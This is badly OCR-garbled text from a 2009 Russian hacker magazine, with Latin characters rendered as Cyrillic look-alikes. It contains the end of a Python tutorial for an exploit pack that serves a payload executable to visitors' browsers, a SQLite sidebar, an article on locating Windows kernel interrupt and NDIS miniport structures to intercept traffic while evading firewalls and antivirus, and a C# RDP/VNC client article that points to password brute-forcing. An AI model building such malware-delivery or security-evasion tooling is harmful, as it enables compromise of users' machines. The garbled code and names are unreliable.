епіег, а в ІоасІ. 

В отдаче файла есть один нюанс, связанный с виндой, потому что в ней 
нужно указывать поток буфера вывода и работать в бинарном режиме: 

ітрогД тзѵсгД 

тзѵсгД . зеДтойе ( зуз . зДсІоиД . іііепо ( ) , оз . 0_ВШАКУ) 

Далее следуютобычные строчки стипом контента и вывод в буфер вы- 
вода: 

зуз . зДскшД . шгі Де ( \ 

іііе (г " . /сіаііа/іоасі. ехе" , " гЬ" ) . геасі ( ) ) 

АДМИНКА 

Админка — технически самая простая и одновременно самая трудоем- 
кая часть. В ней нужно реализовать вывод множества статистических 
данных. Здесь мы реализуем минимальный функционал с выводом 
таблицы епіег и ІоасІ . Главная часть кода состоит из нескольких простых 



строчек, а остальную часть можно посмотреть на диске: 

сопп = здІіДеЗ . соппесД /сіаДа/Ьазе . сПэ ' ) 

Дог гом іп сопп . ехесиДе ( " зеІесД * Дгот %з \ 
огсіег Ьу сІаДе сіезс" % ДаЫе) : 
ргіпД ’<Дг>' 

ргіпД ' <Дсі>%з</Дсі><Дсі>%з</Д(і> ' \ 

% ( гом [ 0 ] , гом [ 1 ] ) 
ргіпД ' </ Дг> ' 
сопп . сіозе ( ) 

ЫАМЕІТ! 

Итак, связка создана. Можно хоть сейчас загружать в нее парусплоитов 
и заливать на сервак. Хотя нет, осталась одна очень важная часть — на- 
звание связки. «Как вы яхту назовете — такона и поплывет», поэтому я 
поименую наш сегодняшний крейсер «Зегдапі Эріоіі Раск». Вот когда в 
него будут добавлены сплоиты, шифрование сплоитов и ЗаѵаЗсгір ротор 
— тогда и переименуем в ОепегаІЭрІоіІ Раск. В общем, пользуйся нашим 
примером для изучения питона, но ни в коем случае не порабощай 
машины бедныхушастых юзеров! Аесли возникнут вопросы —зада- 
вай их мне, грешному. Крометого, не забудь заглянуть на диске целью 
поиска ништяков, поскольку и тут мы тебя не обманем — сорцы, бонусы 
и зс-видео, демонстрирующее работу нашей связки со старенькой 
оперой, не разочаруют. Ал и ос! ~ш~ 



50І_ііе 

50Ы(е — это встраиваемая база 
данных. Слово «встраиваемая» 
означает, что ЗОІліе не использу- 
ет парадигму клиент-сервер; то 
есть движок ЗС^Ьке не является 
отдельно работающим процес- 
сом, с которым взаимодействует 
программа, а предоставляет 
библиотеку, с которой програм- 
ма компонуется, вследствие чего 
движок становится составной 
частью программы. Таким 
образом, в качестве протокола 
обмена используются вызовы 



функций (АРІ) библиотеки 
ЗС^Ьке. Подобный подход умень- 
шает накладные расходы, время 
отклика и упрощает программу. 
ЗОІліе хранит всю базу данных 
(включая определения, табли- 
цы, индексы и данные) в един- 
ственном стандартном файле 
на том компьютере, на котором 
исполняется программа. Про- 
стота реализации достигается 
за счет того, что перед началом 
исполнения транзакции весь 
файл, хранящий базу данных, 
блокируется; АСГО-функции 
достигаются, в том числе, за 
счет создания файла-журнала. 



Несколько процессов или по- 
токов могут одновременно без 
каких-либо проблем читать 
данные из одной базы. Запись в 
базу можно осуществить только 
в том случае, если никаких дру- 
гих запросов в данный момент 
не обслуживается; в противном 
случае попытка записи оканчи- 
вается неудачей, и в программу 
возвращается код ошибки. 
Другим вариантом развития со- 
бытий является автоматическое 
повторение попыток записи в 
течение заданного интервала 
времени. Благодаря архитектуре 
движка, возможно использо- 



вать Зціііе как на встраиваемых 
(етЬесісіесі) системах, так и на 
выделенных машинах с гига- 
байтными массивами данных. 
Сама библиотека ЗОБке напи- 
сана на С; существует большое 
количество привязок к другим 
языкам программирования, 
в том числе С + + , Эаѵа, .ПЕТ, 
РуіЬоп, Регі, РНР, Тсі (средства 
для работы с Тсі включены в 
комплект поставки ЗС^Ьке), 
КиЪу, Назкеіі, Зскете, Зтаікаік, 
Іліа и многим другим. В 2005 
году проект получил награду 
Соо^Іе-О’КеіПу Ореп Зоигсе 
Аѵѵагск. 
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Новые зІеаШі-технологии на службе злобных программеров 



С завидной периодичностью мы публикуем различные кодерские мето- 
ды обхода огненных стен. Оной понятно — противостояние брони 
и снаряда продолжается, новые версии фа еров, проактиво к и интегри- 
рованных систем безопасности выходятболее чем часто. Не отстают от 
девелоперов и злобные кодеры. Они спускаются все ниже и ниже, 
в самые потаенные уголки ядра операционной системы. 



Н еопытному программеру кажется, что, проникнув в ядро 

ѴѴіпсІоѵѵз, можно делать там все, что вздумается, однако это не 
так. Разработчики файрволов, проактивных систем и антиви- 
русов (в большинстве своем] хлеб зря не едят, оставляя мало 
простора для действий честного хакера, вздумавшего поставить систему 
под контроль. Но кое-какие лазейки все же остаются... 

основы основ 

Что такое минипорт? Это, упрощенно говоря, виртуальное представле- 
ние интерфейса сетевого устройства — то, как видит сетевую карту ядро 
операционной системы. Минипортявляется своеобразным посредни- 
ком между чипсетом сетевого адаптера и ядром ОС. Драйверы минипор- 
та напрямую (точнее, через НАІ_ — Нагбѵѵаге АЬзІхасбоп І_ауег] взаимо- 
действуют с сетевым адаптером на самом низком уровне, предоставляя 
некий абстрактный, общий для всех сетевых адаптеров, интерфейс к 
своему сетевому адаптеру другим драйверам и самой операционной 
системе. 



В отличие отвысокоуровневыхдрайверов, драйверы минипорта имеют 
две дополнительные функции, называемые І5Р (ІпІеггиріЭегѵісе 
Воибпе — обработчикпрерывания] и ОрсРогІзгЮеіюггесІ Ргосебиге Са II 
— процедура отложенных вызовов). І5Р является высокоприоритетной 
процедурой, вызываемой при получении прерывания отустройства 
(например, при получении пакета из сети]. В этой процедуре необходимо 
выполнить ряд самых необходимых действий, чтобы не задерживать 
надолго выполнение других процессов. В частности, — запретить 
устройству генерировать данное прерывание. ОРС имеетболее низкий 
приоритетпри планировании потоков и вызывается непосредственно 
после І5Р, если это требуется. Обычно в ЭРС производится обмен дан- 
ными сустройством (например, программирование контроллера ЭМА 
для переписывания вновь пришедшего кадра в оперативную память 
машины из буферной памяти устройства]. Такой драйвер, как правило, 
входит в поставку самой сетевой карты. 

При разработке драйверов сетевых карт разработчикдолжен четко 
следовать правилам, установленным той или иной версией N015, потому 



► 104 



ХАКЕР 09 /129/ 09 





что, какты помнишь, N015 именнотаки переводится — «ІЧеІѵѵогк Огіѵег 
ІпіеНасе 5ресі!іса1:іоп»,то бишь — «спецификация интерфейса сете- 
вого устройства». Впрочем, за более подробным описанием действий 
разработчиков я отсылаютебя к М50ІЧ. В настоящее время актуальной 
является как N015 5.1 (ѵѵ2к/ХР/2003) , так и 6.0 (для ѴѴіпсІоѵѵз ѴізЫ. 

МИНИПОРТ И ВСЕ-ВСЕ-ВСЕ 

В ядре минипорт сетевой карты представлен в виде структуры N О І5_ 
МІМІР0РТ_ВІ_0СК. Она заполняется кучей всяческих данных при реги- 
страции минипорта вызовом системной функции ЫсІізМРедізТегМіпірогІ;. 
Этот вызов происходит в драйвере сетевой карты при его загрузке. 
І\ЮІ5_МІІ\ІІР0НТ_ВІ-0СК — одна из самых важных структур при работе 
с сетью на низком уровне (на уровне сетевой карты]. Описание ее полей 
ты можешь найти в хидере «псііз.б», но надежнее будет сдампить ее 
из файла символов псІіз.рсІЬ утилитой типа рсіЬсІитр ( Шр ://рб Ми гюр- 
зой гсеію где, пеі ). потому что ее структура может меняться от билда к билду 
ОС и сильно зависит от версии N015. В этой статье подразумевается ис- 
пользование N015 версии 5.1 . 

Тем не менее, решая, например, задачи фильтрации, мелкомягкие 
товарищи строго рекомендуютограничиваться «законными» и докумен- 
тированными способами фильтрования сетевого трафика, поскольку 
эта структура критически важна для жизнедеятельности ОС ѴѴіпсІоѵѵз и 
лишний раз ее трогать не стоит. Нозапретный плод сладок. Поэтому ска- 
жу суверенностью, что все самое вкусное для хакера содержится именно 
в І\ЮІ5_МІІ\ІІР0РТ_ВІ-0СК. Кпримеру — функция РаскеІІпсІісаІюНапсІІег, 
которая уведомляет драйвер протокола, что массив полученных пакетов 
доступен для дальнейшей обработки, и передаетей указатель на данный 
массив. 

«Такпочему бы не получить указатель на этот самый N 0І5_М I N I РО РТ_ 

В ЮС К и дальше работать с ним?», — спросишь ты. Вся загвоздка в 
том, что для этого нужно совершитьочень много телодвижений в ядре 
ѴѴіпсІоѵѵз. Они больше напоминаюттанецслона в посудной лавке, что, 
естественно, не пройдет незамеченным для файрвола. Скажем, извест- 
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СТРУКТУРА КШТЕККУРТ 



ный легальный способ получения такого указателя в обобщенном виде 
сводится к вызову І\ЮІ5-функции ІЧсІізПедізІюгРгоІюсоІ, — она всегда 
перехватывается файрволами, проактивными защитами и антивируса- 
ми всех мастей. Что же нам делать? 

В ПОИСКАХ УТРАЧЕННОГО КІМТЕККІІРТ’А 

Еслиужнедаютпощупатьминипортнапрямую.то... поговорим о пре- 
рываниях. Да-да, именно о прерываниях. Речь пойдет не о прямом пере- 
хвате прерывания для сетевого адаптера, — мы копнем гораздо глубже. 
Какты знаешь, все прерывания в ОС ѴѴіпсІоѵѵз представлены в ядре 
в виде та блицы дескрипторов (векторов] прерываний ЮТ(Іп1:еггир1: 
ОезсгірІюгТаЫе]. При генерировании прерывания ядро просматривает 
ЮТ и по номеру прерывания передаетуправление по адресу, соответ- 
ствующему номеру прерывания. Просмотреть ЮТ можно, кпримеру, 
через отладчикѴѴіпОВО при помощи команды «ІісІІ-а» — она выведетна 
экран дамп ЮТ. 

Программным способом загрузка ЮТ осуществляется вызовом ассем- 
блерной команды зісіі: и может вы глядеть так: 

ДАМпимтт 

ЦуресТэТ зСгисС _ІБТ{ 

ШКБ ѵЩішіС; 

БѴГОКБ сІѵѵВазе; 

}ІБТ, *РІБТ; 

ѴОІБ ОебІВТ(ОШ' РІБТ рІсіС) { 

азш 

{ 

МОѴЕАХ, [рійр] 

ЗІБТ [ЕАХ] 

} 

} 

Думаю, код понятен без слов: мы получили ЮТ во всей красе. Но что даль- 
ше? Если приглядеться внимательнее, то можно увидеть, что на самом 
деле при вызове прерывания система не вызывает функцию прерыва- 
ния «железки» напрямую — прежде она должна позаботиться о многих 
других вещах. Система так и делает путем начального вызова функции 
Кі!піеггирПеппрІ.а{е. 

Архитектура ОС ѴѴіпсІоѵѵз подразумевает, что при вызове системной 
функции Кі I піегги р1:Тет ріаіе система должна сохранить контекст 
потока и только затем вызвать функцию обработки прерывания 
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0х806Е6Е2С 


0x08 


<Ы.6Н> 


МУ 


ІпІ 0x3 Е 


0x80540590 


0x80540590 


0x08 


<п&т1ра. е... 


мз: 


ІпС 0x3 Р 


0x80 54 0В Аб 


Ох8054ОВАб 


0x08 


<п1кт1ра. е... 


мз: 


Ы 0x40 


0x80540550 


Ох8054ОВВО 


0x08 


<пікт1ра. е... 


мз: 


Ігй 0x41 


0x805405В А 


Ох80бЕ6С88 


0x08 


<Ы сШ> 


мз: 


Ы 0x42 


0x805405 04 


Ох80540ВС4 


0x08 


<п1кт1ра.е... 


МЗ; 


Іпі 0x43 


0Х8О54ОВСЕ 


Ох80540ВСЕ 


0x08 


<пікш1ра.е... 


мз; 


М 0x44 


0x80540508 


0x80540508 


0x08 


<п&т1ра.г.,. 


мз* 


Ш 0x45 


Ох80540ВЕ2 


Ох30540ВЕ2 


0x08 


<пйат1ра.е,.. 


мз: 
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Чтобы лучше 
ориентироваться 
в ядрокопании на 
сетевом уровне и не 
только, советую сете- 
вой журнал РЬгаск за 
номером 0x41 . А для 
лучшего понимания 
работы системного 
механизма БРС, 
рекомендую статью 
«Абѵапсеб БРСз» 
М.Руссиновича 
[ ЬирУАесЬпеР 
т ісговоЮ сот ). 
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На диске лежат ис- 
ходники драйверов, 
реализующих приемы 
программирования, 
исследуемые 
в статье , а та кже тул - 
зы, которые помогут 
тебе в изучении ядра. 



КЮізраІсЫпІеггирІ, которой в качестве параметра будет 
передан сохраненный указатель на «объект прерыва- 
ния», представленный очень интересной структурой 
КІМТЕРРІЧРТ. 

И только затем передается управление ІЭРтой «железки», 
которая сгенерировала прерывание. Если диззасембли- 
ровать функцию КіІпІеггиріТетрІаІе.то именноэто мы и 
увидим. 

Плясать будем от структуры КІПТЕВРІЭРТ.тем более, она 
встречается какв N0155.1, таки в N0156.0 и длязавладе- 
ния ядром нам нужно получить указатель на нее. Какэтого 
добиться? 

Проще всего — по полученномууказателю на функцию 
КіІпІеггиріТетрІаІе (часто это и есть выдранный адрес из 
ЮТ), диззассемблироватьего на предмет поиска инструк- 
ции «тоѵебі, РКІПТЕРРИРТ». Если найдем, то далее 
можно сделать следующее: запомнить адрес КІИТЕРРІІРТ 
и переходить ко второму способу (описанному ниже) либо 
заменить реальный КІИТЕРРІІРТ на свой собственный, 
подменивту самую функцию ОрсЕогІзг — функцию от- 
ложенной обработки прерывания. Такмы получим доступ к 
данным, пришедшим по сети. Здесь рассматривать способ 
подмены ОрсЕогІзг мы не будем из-за его громоздкости. 
Более подробно о нем можно прочитать в статье «5іеа11:Ь 
Ноокіпд: апоОіегѵѵауІо зибѵегІПЬе ѴѴіпбоѵѵз кегпеі» ( Мир:// 
рЬгаск.огд ). 

На случай, если мы не нашли КІИТЕРРІІРТ минипорта се- 
тевого адаптера, самое время вспомнить, что помимо всего 
прочего, в ядре существует переменная ІпіеггирЮізЮпігу. 
Она представляет собой круговой список Ы5Т_ЕПТРУ, 
содержащий в себе все указатели на зарегистрирован- 
ные в системе структуры КЮТЕРРІІРТ. Достаточно найти 
первый попавшийся, а далее — II БОИ О КІИТЕРРІІРТипк 
= (ІІЕ0П6)&(((РКІПТЕРРІІРТ](АсІсІге55НапсІІ.ег])- 
ИпіеггирЮізіЕпІху], где АсИгеззНапсИегесть адрес любой 
структуры КІИТЕППІІРТ в системе. 

Ну и как вариант напоследок— можно в ядре перехватить 
и дизассемблировать функцию обработки прерываний 



КЮізраІсЫпіеггирІ; ей в качестве одного из параметров 
передается указатель на КЮТЕРРІІРТ. Это отнюдь нелегкий 
способ, посколькутребует отличного знания работы систе- 
мы прерываний в ядре ѴѴіп. 

Вот, в принципе, и все. После нахождения одним из приве- 
денныхспособов КЮТЕРРІІРТ, относящегося кпрерыва- 
нию сетевого адаптера, можно считать, что сетевая карта у 
нас в кармане. 

УДАЛЕНИЕ ГЛАНД ЧЕРЕЗ... 

Итак, мы овладели КІИТЕРРІІРТ. Заметь, не сделали при 
этом ничего такого, что могло бы привлечь внимание бди- 
тельных проактивок. Что дальше? 

Если Мухаммед не идет к горе, значит, гора идет к Мухам- 
меду. Так поступим и мы, чтобы заполучить вожделенный 
N 0 1 5_М I N I РО РТ_В БО0 К. 

В ядре ѴѴіпбоѵѵз значительное количество классов элемен- 
тов представлены в виде устройств (да, девайсов), причем 
это касается не только физических устройств, но и устройств 
виртуальных. Тип «устройство», к примеру, имеюттакие 
эфемерные вещи, какпротоколы сети — Т0Р, ІР, ІЮР — вид 
«\Оеѵісе\Тср». Просмотреть списокдевайсов, зарегистри- 
рованных в системе, можно с помощьюзамечательной 
утилиты «ѴѴіпбоѵѵз ОЬіесІ: Ехріогег» от Еоиг-Е. 

Едем дальше. Находясьв незнакомой обстановке и незная 
имени основного сетевого девайса, соответствующего 
сетевой карте, минипорт найти будет довольно сложно. Но, 
комбинируя приведенныездесьспособы, можно с опреде- 
ленной долей везения все же добиться своего. 

Реализуем следующий алгоритм: сначала находим всеза- 
регистрированные девайсы в системе, открыв директорию 
«\0еѵісе». В цикле получаем указатели на девайсы вызовом 
ОЬОрепО^есЮуИате; по полученномууказателю вызовом 
ОЬРеІегепсеО^есЮуНапбІе и ІоОеЮеѵісеОЬіесіРоіпІег 
получаем указатель на ОЕѴІСЕ_ОВЗЕСТ, а затем оставляем 
те, которые имеюттип, равный 0x17, то есть Р I Б Е_Ю ЕѴ 1 0 Е_ 
РНУ5ІСАІ__ПЕТСАР0. Таким образом, мы получим все 
устройства, относящиеся к сетевому интерфейсу систе- 
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Агенте 
N15 
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О РтСоіЛгаІ 
О Наг<№кОтѴо[ит 
ё Н«р 
ё Ые 
ё НагШгакО 
ё МШз 

ѴУІГЯІ0ѴѴ5 

5е55ІСП5 

ЯРС СогАгоІ 
ВазеНате<ІОЬ]есІ* 
КегпеІОЬ)ее^ 
ОиОВАІ?? 

РіІеЗуеІет 

ОЬіесГТуре* 

Зесигііу 

СайЬаск 

КпошгШ 



ЁхЬгаз Кеір 



Мате ^ 


Туре 


АсШопаІ ІпРогглаЬіоп 


РН 


Г>РЮР_СШЗОІЕО 


Оеѵісе 






Онор^стюіЕі 


Оеѵісе 






О&фОг 


Оеѵісе 






ѢуЯфОгОѵЩг 


Оеѵісе 






О&гірОгРогЬ 


Оеѵісе 






фгкМгѵШ 


Оеѵісе 






& 5С5ІРОГШ 


ЗуппЬоІісІігік 


\Оеѵісе\Ме\МеРогШ 




ЗсзіРоііІ 


ЗутЬокУпк 


\ОеѵІсе\1сІе\ІсІеРогІ 1 




^ЗегіаІО 


Оеѵісе 






Г/5т^бггі0 


Оеѵісе 






0 зузаи^іо 


Оеѵісе 






©Тер 


Оеѵісе 






0ТегпкМ 


Оеѵісе 








Оеѵісе 






ОизврвО'О 


Оеѵісе 






Опроси 


Оеѵісе 






Оизвроо -2 


Оеѵісе 






Оызврсо-з 


Оеѵісе 






ОІІ5ВР00-4 


Оеѵісе 






0Ц5ВРООО 


Оеѵісе 


Корневой и5Ъ концентратор 




0Ц56РОСИ 


Оеѵісе 


Корневой Ц5В концентратор 




Оиввроо-г 


Оеѵісе 


Корневой изв концентратор 




ЙиЗВРОО-З 


Оеѵісе 


Корневой ІІЗВ концентратор 




^.;и5ВРоо-4 


Оеѵісе 


Корневой У5В концентратор 




01І5ВРОО-5 


Оеѵісе 


ІІЗВ НЮ-совместнмое устройство 




С/извроо-б 


Оеѵісе 


ІІЗВ НЮ-совместимое устройство 




Оизврш-7 


Оеѵісе 


Ьр соіог изегЗеІ 5530 (РОТ4Ц5В) 




ОѴісІеоО 


Оеѵісе 






О'ѴІсІеоІ 


Оеѵісе 







СПИСОК УСТРОЙСТВ, УСТАНОВЛЕННЫХ В СИСТЕМЕ 



мы. Оговорюсь сразу, девайсов с типом РІІ_Е_ОЕѴІСЕ_ 
РНУ5ІСАЕ_ЫЕТСАЕ0 в системе, как правило, несколько и, 
чтобы найти нужный, придется их отфильтровывать. Напри- 
мер, по имени драйвера, которое хранится в поле 0РІѴЕР_ 
ОЕиЕСТ.ОгіѵегЫате по смещению 0ЕѴІСЕ_0ЕиЕСТ + 0x8. А 
вот уже дальше, скомбинировав полученные ранее знания, 
можно найти нужный нам минипорт. Все дело втом, что 
правила дизайна ѴѴОМ (ѴѴіпбоѵѵз Огіѵег Мобеі] требуют от 
разработчика драйверов создания некой структуры под 
названием «Оеѵісе Ехіепзіоп», где программист должен 
хранить переменные, поля и структуры, описывающиету 
или иную «железку», под которую пишется драйвер. 

Если присмотреться, то в структуре ОЕѴІСЕОВОЕСТ по 
смещению 0x28 имеется полетипа ѵоіеі*, которое, собствен- 
но, и указывает на созданную разработчиком структуру 
БеѵісеЕхІюпзіоп. Только не следует ее путать с «официально 
прикрепленной» структурой ВЕѴОВ^ЕХТЕЫБІОМ, которая 
идет далее, по смещению ОхЬО. Что это нам даст? Атеперь 
внимание: как непреложное правило, разработчики вука- 
занной структуре сохраняют полученный в ходе инициали- 
зации минипорта указатель на структуру N О І5_М I N I РО РТ_ 
ІІЧТЕРРІІРТ (который возвращается вызовом функции 
ЫсІ ізМ Ред ізі:егІ піегги рі;) . Если в свою очередь посмотреть 
на эту структуру, то мы увидим, что по смещению 0x34 на- 
ходится искомый указатель на N О І5_М I N I РО РТ_В ЮС К. 
Причемтутполученный ранее адрес КІЫРТЕППИРТ? Если 
еще раз глянуть на N О І5_М I N I РО РТ_І ЫТЕРРІЧ РТ, то легко 
увидеть, что первое поле в этой структуре и есть указатель 



0x34 и получаем указатель на Ы0І5_МІ N ІРОРТ ВЮСК. 
Подведя черту вышеизложенному бреду воспаленного со- 
знания, мы получим финальный алгоритм: ищем указатель на 
О ЕѴІ С Е_0 В 3 ЕСТ стипом ЕИЕ_ВЕ\/1СЕ_РНУ51САЕ_МЕТСАРВ, 
находим указатель на ОеѵісеЕхІепзіоп и, начиная сданного 
адреса, шаримся по памяти в поисках разыменованного 
РКІІЧТЕРВиРТ, полученного одним из вышеприведенных 
способов. Если находим — радостно идем пить пиво. Если 
нет — что же, может быть, сегодня не день Бэкхема. 

ЗАКЛЮЧЕНИЕ 

Не скрою, способ сложнореализуем, ненадежен и требует 
определенной доработки. Ктомуже, он годится только для 
драйверов минипорта версии N015 5.1 . Если ты использу- 
ешь ѴізЕа, там уже будет вызов ІЧсІізМВедізІюгІпІюггиріЕх, 
который действует немного по-другому. Но об этом мы 
поговорим позже. В связи с довольно большим объемом 
кода, приводить его здесь непрактично, поэтому драйвер, 
реализующий указанный прием, ищи на диске. 

Что же мы получили в результате? Мы получили большой 
бонус — драйвер, способный перехватывать и контролиро- 
вать сетевые операции в ядре и корректировать их по мере 
необходимости. При этом мы не затронули те критически 
важные для операционной системы вещи, которые обычно 
контролируются проактивными защитами. Получилось не 
только оченьэлегантно, но вполне работоспособно. Я не 
ставил целью предоставить тебе готовое решение, а лишь 
хотел показать, что даже в самых суровых условиях можно 




> іпіо 

Обязательно со- 
ветую установить 
ѴізиаЮОК, которая 
здорово помогает 
при разработке 
драйверов [ Шр:// 
Зои гееію где .пеі:/ 
ргс^есЫѵізиаІсІсІк І. 
Ее ты также сможешь 
найти на диске. 

Если есть вопросы — 
пиши, обсудим. 




> ѵѵагпіпд 

Рассматриваемый 
в статье код справед- 
лив для ѴѴ2к/ХР/2003. 



на КІЫТЕРРОРТ. Выходит, найдя разыменованный адрес найти для своей программы способ выживания в системе. 
К I N Т Е Р Р Ю РТ , можно за получить указатель на N О І5_ Все, что для этого нужно — задать себе вопрос: «А что, 

МІ N ІРОРТ_ІЫТЕРРП РТ... а дальше — все просто: добавляем если...?». Удачи Іцс 



В ѴѴіпсІоѵѵз Ѵізіа эти 
приемы работать не 
будут. 
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АДМИНИМ 

ПО-КОДЕРСКИ 

Массовое производство КйР и ѴЫС клиентов 

На моей основной работе мне приходится заниматься администриро- 
ванием серверов и рабочих станцией, работающих под управлением 
ѴѴіпсІоѵѵз/ипих. К серверам я привык подключаться через стандарт- 
ный ВОР, а для соединения с рабочими местами пользователей чаще 
предпочитаю использовать одну из модификаций ѴЫ С. 



Ф ункциональность НОР и ѴІ\ІС меня полностью удовлет- 
воряет, за исключением одного «но». При интенсивной 
работе мой рабочий стол захламляется копиями при- 
ложений ТідЫ:ѴІ\ІС и ГП5І5С. Бывает, работаешь стремя 
серверами, а тут тебе звонит пользователь и слезно просит помочь. 
Хочется или нет, а приходится сворачивать окна плзізс и запускать кон- 
сольТідЫѴІЧС. В результате, рабочий стол быстро превращается в хаос, 
состоящий из открытых окон інпзізс и ТідЫѴІЧС. Найти втаком бардаке 
окно с нужным сеансом крайне проблематично. 

Однажды меня все это окончательно достало, и я решил во что бы то ни 
стало исправить ситуацию. Что из этого получилось, ты узнаешь по ходу 
чтения этой статьи. 

ПУТЬ СМЕРТНОГО 

Пожалуй, самым простым способом решения проблемы будет поиск и 
внедрение готового клиента-комбайна, поддерживающего протоколы 
ВБР и ѴКІС. Способ, несомненно, хорош, а главное, времени на его реа- 
лизацию практически не тратится. Утилит пруд пруди, успевай только 



выбирать. Но, отдавая предпочтение готовому софту, ты автоматически 
становишься обладателем всех его плюсов и минусов. Среди основ- 
ных минусов обычно выступает цена. Продвинутый софт стоит денег, а 
бесплатный редко обладает всеми необходимыми функциями. В свое 
время меня это неустроило, и я решил пойти по нетоптаной дорожке. 

ПУТЬ ДЖЕДАЯ 

Вооружившись сишарпом, я задумал создать клиент, способный под- 
держивать подключения по протоколам ВБР и ѴІ\ІС. Решить проблему 
открытых окон я запланировал с помощью хорошо проверенного метода 
— использования вкладок. Ачто? Все ѴѴЕВ-браузеры, втом числе и 
хромой ослик ИА, открывают новые страницы в отдельном табе. Юзеры 
фичей довольны, и уже ни одного из них не заставишь от нее отказаться. 
Тем более, в заголовке таба можно прописывать название сервера. 

КОР 

Для организации поддержки протокола ВБР обратимся за помощью 
кСот-компоненту — МісгозоІТ ВРР СІіепТ Пользоваться компонен- 
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НЕРАССМОТРЕННЫЕ МЕТОДЫ РЕМОТЕОЕ5СТОР 



• ІзСоппесіесІ — возвращает ігие, если соединение с удаленным 
компьютером установлено; 

• Бізсоппесі: — выполняет отключение от удаленной машины; 

• ЗегЗсаНп^Мобе (Ъооі зсаіесі) — если в качестве единственного 
параметра передаем пліе, то будет установлен режим масштаби- 
рования; 

• Ри1І5сгееп11рсІаі:е() — полноэкранный режим; 

• Рі1І5егѵегСІірЬоагсі() — перенос содержимого буфера обмена с 
локальной машины на удаленную. 










том чрезвычайно просто и, что немаловажно, удобно. Ктомуже, он 
установлен в каждой системе, поэтому заботиться о его поставке тебе 
не придется. 

Чтобы воспользоваться возможностями компонента, тебе необхо- 
димо добавить его на панель выбора элементов. Делается это через 
окно «Выбор элементов панели инструментов -> СОМ-компоненты». 

В представленном списке компонент отметь флажком МісгозоЙ ВОР 
Сііепі; Сопітоі. На панели выбора элементов, как и следовало ожидать, 
появится новый компонент. 

Для демонстрации возможностей компонента я накидал про- 
стенький демонстрационный пример. Давай поглядим на методы 
и свойства недавно установленного компонента. Начнем наше 
знакомство со свойств: 

Соппескесі — если соединение с удаленным рабочим столом 
установлено, то здесь будет 1 

СоІогБеркЬ — палитра цветов . Может принимать следующие 
значения: 8, 15, 16, 24, 32 

Зегѵег — адрес удаленного сервера. Одинаково воспринима- 
ет как символьные имена, так и ІР-адрес 
ТТзегЫате — имя пользователя 

Ас1ѵапсес18еккіпдз2 . СІеагТехбРаззтоогсі — пароль 
АсІѵапсе(18еккіпдз2 .КБРРогб — номер порта 
БезкборѴІісібІі — ширина удаленного рабочего стола 
БезкборНеідЬб — высота удаленного рабочего стола 
РиІІЗсгееп — полноэкранный режим 

КесІігескРгіпбегз — переопределять принтеры. Если кгие, 
то при отправке документа на печать с удаленной машины, 
он будет печататься на твоем принтере 
КейігескЗтагбСагсІз — переопределять смарт-карты 
КесІігескРогбз — переопределять порты 

Со свойствами разобрались, перейдем к методам. Из всех имеющихся 
нас интересуютлишьдва: СоппесШ и ОізсоппесШ. Полагаю, пояснять, 
для чего они нужны, необходимости нет. 

Помимо свойств и методов, как и у любого другого компонента, у М5 
ПОР Сііепі; Сопітоі имеется целая пачка событий. Здесь рассматривать 
не буду, поскольку об их предназначении нетрудно догадаться по на- 
званию. 

Теорией мы заправились, а раз так, самое время переходить к практике! 
Рассмотрим КОД: 

ПОДКЛЮЧАЕМСЯ КВйР 

КбрСІіепД . Зегѵег = ДехДВохІ . Техб . Тгіш ( ) ; 

КсІрСІіепк . АсІѵапсесІЗеккіпдз2 . СІеагТехДРаззѵлэгсІ = 
кехДВохЗ . Техк . Тг іт ( ) ; 

КбрСІіепД . бзегЕате = кехДВох2 . Техк ; 

// КсІрСІіепк . Ботаіп = "Домен"; 

// КсІрСІіепк . РиІІЗсгееп = кгие; 




зѵ^ікок (сотЬоВохІ . ЗеІескеЫпсІех) 

{ 

сазе 0: КсІрСІіепк . СоІогБеркЬ. = 15; 
Ьгеак; 

сазе 1: КсІрСІіепк . СоІогБеркЪ. = 16; 
Ьгеак; 

сазе 2: КсІрСІіепк . СоІогБеркЪ. = 24; 
Ьгеак; 

сазе 3: КсІрСІіепк . СоІогБеркЬ. = 32; 
Ьгеак; 

} 

змікск (сотЬоВох2 . ЗеІескеЫпсІех) 

{ 

сазе 0 : 

КсІрСІіепк . БезккорШісІкЪ. = 64 0; 
КсІрСІіепк . БезккорНеідЬк = 48 0; 
Ьгеак; 
сазе 1 : 

КсІрСІіепк . БезккорМісІкЬ. = 8 00; 
КсІрСІіепк . БезккорНеідЬк = 600; 
Ьгеак; 
сазе 2 : 

КсІрСІіепк . БезккорМбкЪ. = 1024; 
КсІрСІіепк . БезккорНеідЬк = 768; 



УСТАНОВКА СОЕДИНЕНИЯ С СЕРВЕРОМ ѴЫС 



зкгіпд гетокеНозк = ТехкВохІ . Техк ; 

іпк гетокеРогк = Сопѵегк . ТоІпк32 (ТехкВох2 .Техк) 

к ту { 

гетокеБезккорІ . ѴпсРогк = гетокеРогк; 
гетокеБезккорІ . Соппеск (гетокеНозк , 
каізе, кгие) ; 

} 

сакск (ѴпсРгокосоІЕхсеркіоп ѵех) { 

МеззадеВох . Зкюм ( зкгіпд . Рогтак ( "Невозможно 
установить соединение: {0}" , ѵех.Меззаде) ) ; 

} 
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На основе полученных знаний ты без проблем сможешь написать 
полезные в хакерском деле утилиты — брутфорсеры. Например, 
совсем недавно в нашем журнале был рассказ об утилите, которая 
подбирает пароль к КБР. В ее основе как раз лежала технология, 
которую мы сегодня разобрали. Так что, мотай на ус и не рас- 
слабляйся. 



Ьгеак; 
сазе 3 : 

КбрСІіепк . БезкборМісЩЬ. = 112 0 ; 
КбрСІіепк . БезкборНеідЪЬ = 700 ; 
Ьгеак; 
сазе 4 : 

КЬрСІіепЬ . БезкЬорШісІЬЪ. = 12 80 ; 
КбрСІіепк . БезккорНеідіШ = 1024 ; 
Ьгеак; 
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РАЗРАБОТКА В САМОМ РАЗГАРЕ 

В этом небольшом куске кода я вызываю стандартный диалоготкрытия 
файлов. Если пользователь выбрал файл, то мне ничего не остается, 
кроме как создать экземпляр объекта типа ВОРЕіІе и выполнитьего 
метод РеасН). В качестве параметра методу надо передать путь к файлу, 
который и нужно читать. Завершив чтение, поля объекта МуВбрЕіІе 
будут заполнены данными из файла. Например: 



ВОРСІ-ІЕМТ.СОМЫЕСТО; 

Весь процессустановки связи судаленным хостом сводится кзаполне- 
нию свойств компонента РбрСІіепІ: и вызову метода СоппесШ. В случае, 
когда вся введенная инфа корректна, подключение будет установлено, 
а если нет— вылетитэкспешн. 

Замечу, что в этом коде я не делал обработку ошибок. В реальном при- 
ложении она необходима. Попробуй реализовать их самостоятельно, 
